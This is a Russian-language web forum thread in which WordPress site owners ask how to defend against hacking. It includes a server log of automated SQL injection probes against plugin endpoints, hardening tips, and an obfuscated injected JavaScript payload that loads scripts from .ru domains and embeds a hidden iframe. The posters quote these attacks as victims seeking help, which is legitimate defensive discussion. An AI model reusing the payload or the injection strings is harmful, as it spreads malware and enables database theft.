Помощь Взламывают сайт, как лучше защититься?

[djchange]

Статистика показывает что постоянно хотят взломать сайт:
Что пытаются сделать этим кодом? я так понимаю лезут в админку? что хотят сделать?

     22:40:38 ->[404] /wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=-1
       22:40:49 ->[404] /wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=-1+union+select+1
       22:40:58 ->[404] /wp-content/plugins/all-video-gallery/conf(...)vid=1&pid=11&pid=-1+union+select+1+from+wp_users
       22:43:15 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and 1=2]&type=html
       22:46:18 ->[404] /wp-content/plugins/wpSS/ss_handler.php?ss_id=-20 UNION ALL SELECT 1,2,3,4
       22:48:15 ->[404] /wp-content/plugins/fbgorilla/game_play.ph(...)user_login)*/),4,5,6,7,8,9,0,1,2,3+from+wp_users
       22:49:23 ->[404] /wp-content/plugins/contus-video-gallery/myextractXML.php
       22:49:52 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=0[ and 1=2]&type=html
       22:50:03 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=10000[ and 1=2]&type=html
       22:51:47 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and union+select+1+from+wp_users]&type=html
       22:51:56 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[and union+select+1+from+wp_users]&type=html
       22:52:03 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[and+union+select+1+from+wp_users]&type=html
       22:52:11 ->/wp-admin/admin-ajax.php?action=go_view_object&v(...)[and+union+select+login+from+wp_users]&type=html
       22:52:20 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=and+union+select+login+from+wp_users&type=html
       22:52:27 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=
       22:52:33 ->/wp-admin/admin-ajax.php
       22:52:39 ->/wp-admin/admin.php
       22:52:41 ->/wp-login.php?redirect_to=http://мой-сайт.com/wp-admin/admin.php&reauth=1
       22:52:43 ->/
       22:52:47 ->/detect/
       22:52:48 ->/wp-admin/admin-ajax.php
       22:54:55 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=18
       22:55:01 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=2
       22:55:06 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=3
       22:55:10 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=5
       22:55:16 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=7
       22:55:22 ->/
       22:55:25 ->/detect/
       22:56:49 ->/
       22:57:05 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=7

Чем защититься чтобы таким образом не ломали?

 

[_alex]

Большинство взломов WP происходит автоматическим сканированием и выявлением какой CMS стоит версия и плагины, поэтому если изменить путь к админке + убрать информацию о версии и прочее
remove_action( 'wp_head', 'feed_links_extra', 3 );
remove_action( 'wp_head', 'feed_links', 2 );
remove_action( 'wp_head', 'rsd_link' );
remove_action( 'wp_head', 'wlwmanifest_link' );
remove_action( 'wp_head', 'index_rel_link' );
remove_action( 'wp_head', 'parent_post_rel_link', 10, 0 );
remove_action( 'wp_head', 'start_post_rel_link', 10, 0 );
remove_action( 'wp_head', 'adjacent_posts_rel_link', 10, 0 );
remove_action( 'wp_head', 'wp_generator' );

Ещё я ставлю плагин Login LockDown для защиты от брута

Для изменения папки wp-content и наименований куки:

define('USER_COOKIE', '906-user_' . COOKIEHASH);
define('PASS_COOKIE', '906-pass_' . COOKIEHASH);
define('AUTH_COOKIE', '906-' . COOKIEHASH);
define('SECURE_AUTH_COOKIE', '906-sec_' . COOKIEHASH);
define('LOGGED_IN_COOKIE', '906-logged_in_' . COOKIEHASH);
define('TEST_COOKIE', '906-cookie');

define('WP_CONTENT_DIR', ABSPATH . '906'); // wp-content Directory
define('WP_CONTENT_URL', 'Для просмотра ссылки Войди или Зарегистрируйся // wp-content URL

 

[Sergiop]

_alex, я так понимаю эти функции надо вставить в functions.php или в плагин и заменить 906 на свою папку? Или не только?
И с куками не до конца ясно, почему и там 906? Или не обязательно их как и папку называть..

 

[ASPisklov]

Самый простой способ обезопасить сайт - ограничить доступ к админке через htaccess, ну и не забывать обновлять все.

 

[WP30]

Самый простой способ обезопасить сайт - ограничить доступ к админке через htaccess, ну и не забывать обновлять все.

а как же остальные способы доступа к сайту? админка - это только одно из...

 

[ASPisklov]

а как же остальные способы доступа к сайту? админка - это только одно из...

Какие именно? Перекрыв доступ к админке Вы на 99% обезопасите себя от "случайных" взломов. Другое дело, если кто-то целенаправленно задается целью взломать ваш сайт.
Также стоит помнить о том, откуда вы берете расширения для сайта. Еще один вариант - человеческий фактор: не забывайте менять пароли, если давали кому-то их.

 

[r_219]

• Для просмотра ссылки Войди или Зарегистрируйся: программа для поиска уязвимостей на сайтах WordPress и брутфорса паролей.

Ищем уязвимости и закрываем их.

 

[troop3r]

держу копии движков всех сайтов на github, папку аплоадс и базу бэкаплю раз в месяц/неделю, если вдруг хачат - сношу все с фтп, меняю пароли и перезаливаю файлы и базу

 

[djchange]

Сегодня на одном из своих сайтов WP с Woocommerce обнаружил в описании товаров вот такой JS код... который выдавал всплывающие рекламные окна. Логины и пароли у сайта сложные, стоят для защиты плагины BBQ и BulletProof Security. Как написали на хостинге, чтобы впихунть такой код, необязательно знать логин и пароль от Админки или FTP, а типа запихивают через метод POST.

Подскажите, как защититься от такого?

<script>// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse(&#039;["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]&#039;),e="",t="8066",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(&#039;http&#039;)==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf(&#039;http&#039;)==0)return p;}else{break;}}return &#039;&#039;},a=function(o,e,t){var lp=p();if(lp==&#039;&#039;)return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf(&#039;firefox&#039;) == -1))window.smlo.loadSmlo(n.replace(&#039;https:&#039;,&#039;http:&#039;));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf(&#039;firefox&#039;) == -1))window.zSmlo.loadSmlo(n.replace(&#039;https:&#039;,&#039;http:&#039;));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("МОЙ САЙТ.com")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
// ]]></script><iframe id="a1996667054" style="display: none;" src="https://al9l235gkc7d.ru/f.html" width="300" height="150"></iframe>

 

[djchange]

Авторизация по IP конкретному, нужные права на папке и никаких левых модулей (99% написано, как ручками реализовать) и WP будет шустрее + его ломануть в таком случае будет очень проблематично.

тоесть по конкретному IP? для FTP у меня именно так и реализовано, подключение только с определенных IP, админка спрятана, а авторизация на сайте открыта для посетителей, так как у меня магазин...

 

[Sergiop]

админка спрятана, а авторизация на сайте открыта для посетителей, так как у меня магазин...

Как это, админка спрятана, а авторизация открыта? Просто что не по-умолчанию путь к ней, или чего..
Тогда можно как пользователь ссылку "Вход" нажать и перейти на страницу входа, где собственно при определённом логине и пароле и будет админка, или я чего-то не так понял?